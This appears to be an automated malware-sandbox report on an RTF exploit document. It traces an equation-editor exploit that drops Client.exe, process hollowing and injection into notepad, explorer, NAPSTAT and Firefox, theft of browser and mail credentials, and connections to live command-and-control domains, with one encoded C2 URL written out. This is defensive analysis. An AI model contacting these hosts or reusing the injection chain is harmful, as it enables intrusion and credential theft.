          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041E0CB push eax; ret
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041B11A push edi; retf
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0041E12C push eax; ret
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_0040D2D0 pushfd ; retf
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00406AE4 push ebp; ret
          Source: Client.exe.0.dr Static PE information: section name: bdzG4e
          Source: Client.exe.0.dr Static PE information: section name:
          Source: initial sample Static PE information: section name: bdzG4e entropy: 7.99949678623572
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\Client.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1404 Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2252 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2652 Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B60101 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Code function: 5_2_01188E9C sldt word ptr [eax]
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000A.00000000.1006484314.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.1011618925.0000000008844000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000A.00000000.1011618925.0000000008844000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000A.00000000.968063390.000000000434F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 0000000A.00000000.1027105135.000000000037B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 0000000A.00000000.968616738.0000000004423000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.1006484314.00000000043F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 0000000A.00000000.968063390.000000000434F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
          Source: EQNEDT32.EXE, 00000002.00000003.898154429.00000000005C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Vmcicda.dll
          Source: explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B60101 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Client.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B00080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B000EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\notepad.exe Code function: 9_2_00B226F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process queried: DebugPort
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\notepad.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\Client.exeCode function: 5_2_00363550 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | Domain query: www.magadirect.co.uk
Source: C:\Windows\explorer.exe | Network Connect: 45.33.18.44 80
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Section unmapped: C:\Windows\SysWOW64\notepad.exe base address: 400000
Source: C:\Windows\SysWOW64\notepad.exe | Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: A00000
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section unmapped: C:\Program Files (x86)\Mozilla Firefox\firefox.exe base address: 190000
Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 7EFDE008
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 80000
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Memory written: C:\Windows\SysWOW64\notepad.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\notepad.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\notepad.exe | Thread register set: target process: 1860
Source: C:\Windows\SysWOW64\notepad.exe | Thread register set: target process: 1860
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Thread register set: target process: 1860
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Thread created: C:\Windows\SysWOW64\notepad.exe EIP: 75554977
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
Source: explorer.exe, 0000000A.00000000.984754885.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.951754136.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027690828.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.984754885.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.951754136.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.984754885.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.951754136.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027690828.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager<
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

Source: Yara match | File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\NAPSTAT.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

Source: Yara match | File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Columns: Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
(The number shown next to a technique on the original page is kept in parentheses; "-" marks an empty cell.)

Valid Accounts | Shared Modules (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (1) | OS Credential Dumping (1) | File and Directory Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (4) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution (43) | Boot or Logon Initialization Scripts | Process Injection (812) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | System Information Discovery (13) | Remote Desktop Protocol | Man in the Browser (1) | Exfiltration Over Bluetooth | Encrypted Channel (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (3) | Security Account Manager | Security Software Discovery (121) | SMB/Windows Admin Shares | Data from Local System (1) | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing (3) | NTDS | Process Discovery (2) | Distributed Component Object Model | Email Collection (1) | Scheduled Transfer | Application Layer Protocol (13) | SIM Card Swap | Carrier Billing Fraud | -
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Virtualization/Sandbox Evasion (41) | SSH | Clipboard Data (1) | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | -
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading (1) | Cached Domain Credentials | Remote System Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | -
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion (41) | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | -
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection (812) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | -
Behavior Graph

Behavior Graph ID: 680332
Sample: SecuriteInfo.com.Exploit.Rt...
Startdate: 08/08/2022
Architecture: WINDOWS
Score: 100

Process tree and per-node findings (rebuilt from the behavior graph text):

• Sample start
  • Domains: www.luanaterra.online, www.hogogala.com
  • Signatures: Document contains OLE streams which likely are hidden ActiveX objects; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 10 other signatures
  • WINWORD.EXE started (graph counts: 292, 21)
    • Dropped: C:\Users\user\AppData\Local\Temp\Client.exe (PE32); C:\Users\user\...\Client.exe:Zone.Identifier (ASCII); ~WRF{35F4FC89-AF57...1-CE9C986E155F}.tmp (Composite)
    • Signature: Document exploit detected (creates forbidden files)
  • EQNEDT32.EXE started (graph count: 47)
    • Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    • cmd.exe started
      • Client.exe started
        • Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 3 other signatures
        • notepad.exe started
          • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
          • explorer.exe (injected)
            • DNS/IP: www.magadirect.co.uk 45.33.18.44, 49171, 80, LINODE-APLinodeLLCUS, United States
            • Signature: System process connects to network (likely due to code injection or exploit)
            • NAPSTAT.EXE started (graph count: 9)
              • DNS/IP: www.sqlite.org 45.33.6.223, 49172, 80, LINODE-APLinodeLLCUS, United States
              • Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
              • firefox.exe started

Source | Detection | Scanner | Label
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf | 15% | ReversingLabs | Document-RTF.Trojan.Heuristic

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Temp\Client.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\Client.exe | 22% | ReversingLabs | ByteCode-MSIL.Spyware.Noon

Source | Detection | Scanner | Label
9.0.notepad.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.2.notepad.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.0.notepad.exe.400000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.0.notepad.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.0.notepad.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.0.notepad.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

No Antivirus matches
Source | Detection | Scanner | Label
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
www.bookmarkfiles.info/aekc/ | 0% | Avira URL Cloud | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://java.sun.com | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.magadirect.co.uk/aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM | 0% | Avira URL Cloud | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.hogogala.com | 162.213.253.236 | true | false | - | unknown
www.sqlite.org | 45.33.6.223 | true | false | - | high
www.magadirect.co.uk | 45.33.18.44 | true | true | - | unknown
www.luanaterra.online | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.sqlite.org/2014/sqlite-dll-win32-x86-3080700.zip | false | - | high
www.bookmarkfiles.info/aekc/ | true | Avira URL Cloud: safe | low
http://www.magadirect.co.uk/aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | - | high
http://investor.msn.com | explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | - | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.iis.fhg.de/audioPA | explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleanerq | explorer.exe, 0000000A.00000000.1029291046.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.986329833.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.958357895.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.piriform.com/ccleaner1SPS0 | explorer.exe, 0000000A.00000000.978377131.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010833057.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993943393.0000000008611000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | - | high
http://treyresearch.net | explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | - | high
http://java.sun.com | explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | false | - | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 0000000A.00000000.1010360758.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995439916.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979257547.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.950353171.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.994846785.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979787030.000000000880D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.992888492.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011293822.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993114505.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010156944.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.976835880.00000000084D2000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://investor.msn.com/ | explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | - | high
http://www.piriform.com/ccleaner | explorer.exe, 0000000A.00000000.976786692.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://computername/printers/printername/.printer | explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | explorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | low
